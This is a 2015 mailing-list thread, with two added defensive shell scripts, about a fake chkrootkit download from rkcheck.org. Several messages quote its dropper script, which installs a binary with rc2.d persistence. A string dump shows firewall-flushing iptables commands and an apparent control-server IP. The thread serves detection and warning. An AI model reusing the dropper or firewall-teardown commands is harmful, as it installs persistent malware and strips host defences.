> On 25.02.2015 at 21:25, Joseph Mingrone <jrm at ftfl.ca> wrote:
>
> Philip Jocks <pjlists at netzkommune.com> writes:
>> are those the only lines they sent you? Weirdly, we got a report like this today
>> as well with the first (out of 8) sample line showing the exact time stamp
>> (23/Feb/2015:14:53:37 +0100) and the exact query string
>> (/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which makes it
>> a bit strange to be a coincidence. There is a webserver running in a jail on the
>> reported IP address, but I can't find any log lines on our side that could be
>> related.
>> We asked the email.it folks for details, but haven't heard back from them yet.
>>
>> Philip
>
> Interesting. Yes, they sent nearly the same line about 8 times with the timestamps a
> second or two apart. What other daemons are you running on that host?
> Something other than the webserver could be compromised.
>
> Please share if you hear anything from email.it.
>
> Joseph

It felt pretty scammy to me; googling for the "worm" got me to rkcheck.org, which was registered a few days ago and looks like a tampered version of chkrootkit. I hope nobody installed it anywhere; it seems to execute rkcheck/tests/.unit/test.sh, which contains

#!/bin/bash

cp tests/.unit/test /usr/bin/rrsyncn
chmod +x /usr/bin/rrsyncn
rm -fr /etc/rc2.d/S98rsyncn
ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
/usr/bin/rrsyncn
exit

That doesn't look like something you'd want on your box...

Cheers,

Philip
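An added check for the dropper quoted above, written for this thread and not part of any message here or of chkrootkit. It inspects an unpacked copy of the archive for the hidden tests/.unit directory and for scripts that write into /usr/bin or an /etc/rc?.d directory, and it checks a filesystem root for the two traces test.sh leaves behind (the copied binary and the S98rsyncn symlink). The paths are the ones in the quoted script; the directory arguments and function names are this example's own, so the checks can be pointed at a staging copy instead of the live root. Note that /etc/rc2.d is a SysV-style runlevel directory, so the persistence step only takes on Linux-style hosts; on FreeBSD the copy into /usr/bin would still happen if bash were present.

```shell
#!/bin/sh
# Added example for this thread, not code from any message or from chkrootkit.
# Two checks derived from the quoted test.sh: one for an unpacked copy of the
# rkcheck archive, one for a host that may already have run it.

# rkcheck_archive_check DIR
# DIR is an unpacked copy of the archive (argument name is this example's own).
# Flags hidden directories like tests/.unit and any shell script that copies
# into /usr/bin or wires something into an /etc/rc?.d runlevel directory.
# Prints each finding; returns 1 if anything was found, 0 if clean.
rkcheck_archive_check() {
    dir=$1
    found=0
    # '.?*' matches dot-names with at least one more character, so DIR itself
    # is never flagged when it is given as '.'.
    for hidden in $(find "$dir" -type d -name '.?*' 2>/dev/null); do
        echo "hidden directory: $hidden"
        found=1
    done
    for script in $(find "$dir" -type f -name '*.sh' 2>/dev/null); do
        if grep -Eq '(cp|mv|ln -s) .*/(usr/bin|etc/rc[0-9S]\.d)/' "$script"; then
            echo "dropper-like script: $script"
            found=1
        fi
    done
    return $found
}

# rkcheck_host_check ROOT
# ROOT is "/" on the live system; pass a staging directory (an assumption of
# this example) to try it safely. Looks for the copied binary and the rc2.d
# entry that the quoted script creates. Returns 1 on any hit, 0 if clean.
rkcheck_host_check() {
    root=${1%/}
    found=0
    if [ -f "$root/usr/bin/rrsyncn" ]; then
        echo "binary present: $root/usr/bin/rrsyncn"
        found=1
    fi
    # -L catches the symlink even when its target has since been removed.
    if [ -L "$root/etc/rc2.d/S98rsyncn" ] || [ -e "$root/etc/rc2.d/S98rsyncn" ]; then
        echo "rc entry present: $root/etc/rc2.d/S98rsyncn"
        found=1
    fi
    return $found
}

# Usage: sh rkcheck_ioc.sh [ARCHIVE_DIR] [ROOT]
# Without ARCHIVE_DIR only the host check runs; ROOT defaults to "/".
if [ "$#" -ge 1 ]; then
    rkcheck_archive_check "$1" || echo "archive $1: suspicious"
fi
rkcheck_host_check "${2:-/}" && echo "host ${2:-/}: no rrsyncn traces"
```

Both functions use the exit status as the verdict, so they drop into a cron job or a jail-by-jail loop without parsing output.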
Philip Jocks <pjlists at netzkommune.com> writes:
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope nobody installed it anywhere, it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful.

Joseph
> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I filed a report with Google about that domain (Google Safe Browsing), briefly describing what's been recounted here on this thread. It seems quite suspicious, agreed.

Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting; take note of what looks to be an IP address, 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
>
> Philip

Chris
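The string dump Chris describes, as an added example that is not part of this thread: a portable stand-in for strings(1) built from tr and grep, plus two filters over its output for the indicators that stood out above, iptables flush/policy commands and a dotted-quad address. The rrsyncn binary itself is not reproduced; make_sample writes a constructed blob containing the strings from the dump, wrapped in fake ELF bytes, so the script runs offline. All function names and the sample are this example's own.

```shell
#!/bin/sh
# Added example for this thread, not code from any message.
# Minimal string-dump triage: extract printable runs from a binary and flag
# the indicators seen in the rrsyncn dump (firewall tear-down, an IPv4 literal).

# dump_strings FILE [MINLEN]
# Stand-in for strings(1): every non-printable byte becomes a newline, then
# only runs of at least MINLEN printable characters are kept. LC_ALL=C keeps
# tr and grep byte-oriented so high bytes in the binary do not confuse them.
dump_strings() {
    minlen=${2:-4}
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E ".{$minlen,}"
}

# find_firewall_teardown FILE
# iptables invocations that flush or delete chains or set ACCEPT policies:
# a dropper disabling the host firewall before it opens a listener.
find_firewall_teardown() {
    dump_strings "$1" | grep -E 'iptables .*(-F|-X|-P (INPUT|FORWARD|OUTPUT) ACCEPT)' | sort -u
}

# find_ipv4 FILE
# Dotted quads embedded as literals; a hard-coded address in a binary that
# also tears down the firewall is a likely command-and-control endpoint.
# The pattern does not range-check octets, which is acceptable for triage.
find_ipv4() {
    dump_strings "$1" | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# make_sample FILE
# Writes a constructed stand-in for the rrsyncn binary: a fake ELF header,
# stray high bytes and NULs around a subset of the strings from the dump.
# "ELF" is only three characters, so the default MINLEN of 4 drops it.
make_sample() {
    printf '\177ELF\002\001\001\000\000\000\377\376/bin/sh\000\000iptables -X 2> /dev/null\000iptables -F 2> /dev/null\000iptables -t nat -F 2> /dev/null\000iptables -P INPUT ACCEPT 2> /dev/null\000iptables -P OUTPUT ACCEPT 2> /dev/null\000\000udevd\n95.215.44.195\n;*3$"\000\001\002' > "$1"
}

# Usage: sh triage.sh /path/to/rrsyncn
# With no argument the constructed sample is written to a temp file and used.
if [ "$#" -ge 1 ]; then
    target=$1
else
    target=$(mktemp "${TMPDIR:-/tmp}/rrsyncn.XXXXXX")
    make_sample "$target"
fi
echo "== strings =="
dump_strings "$target"
echo "== firewall tear-down =="
find_firewall_teardown "$target"
echo "== embedded addresses =="
find_ipv4 "$target"
[ "$#" -ge 1 ] || rm -f "$target"
```

Run it on the real binary only on an isolated machine; a string dump never executes the file, but copying the sample around is how it spread in the first place. On a real sample the address list is the thing to feed into firewall and flow logs next.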